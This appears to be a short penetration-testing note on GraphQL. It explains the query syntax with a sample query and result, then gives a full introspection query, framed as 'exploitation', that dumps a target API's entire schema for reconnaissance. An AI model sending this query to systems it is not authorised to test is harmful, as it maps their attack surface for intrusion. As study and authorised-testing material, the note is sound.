Exploitation - GraphQL

Overview

GraphQL is an open-source data query and manipulation language for APIs. GraphQL was developed internally by Facebook in 2012 before being publicly released in 2015. On 7 November 2018, the GraphQL project was moved from Facebook to the newly-established GraphQL Foundation, hosted by the non-profit Linux Foundation.

Whenever a GraphQL service receive (typically trough a POST HTTP request at an URL on a web service) a query, the query will first be checked to ensure it only refers to the types and fields defined, then run by the service to in turn interact with arbitrary code and ultimately retrieve data from a database (or any kind of storage mechanism).

GraphQL syntax

A simple GraphQL query to retrieve the name and age of a person object which has an id egal to 3 would look like:

{
  person(id: "3") {
    name
    age
  }
}

The query above would produce, for example, when run by the GraphQL service and by a potential DataBase Management System (DBMS) service, the following result:

{
  "data": {
    "person": {
      "name": "Smith",
      "age": "35"
    }
  }
}

For more information on the GraphQL syntax, refer to the official documentation:

https://graphql.org/learn/queries/

Information leakage through interospection

{"query": "query IntrospectionQuery {__schema {queryType { name },mutationType { name },subscriptionType { name },types {...FullType},directives {name,description,args {...InputValue},onOperation,onFragment,onField}}}\nfragment FullType on __Type {kind,name,description,fields(includeDeprecated: true) {name,description,args {...InputValue},type {...TypeRef},isDeprecated,deprecationReason},inputFields {...InputValue},interfaces {...TypeRef},enumValues(includeDeprecated: true) {name,description,isDeprecated,deprecationReason},possibleTypes {...TypeRef}}\nfragment InputValue on __InputValue {name,description,type { ...TypeRef },defaultValue}\nfragment TypeRef on __Type {kind,name,ofType {kind,name,ofType {kind,name,ofType {kind,name}}}}"}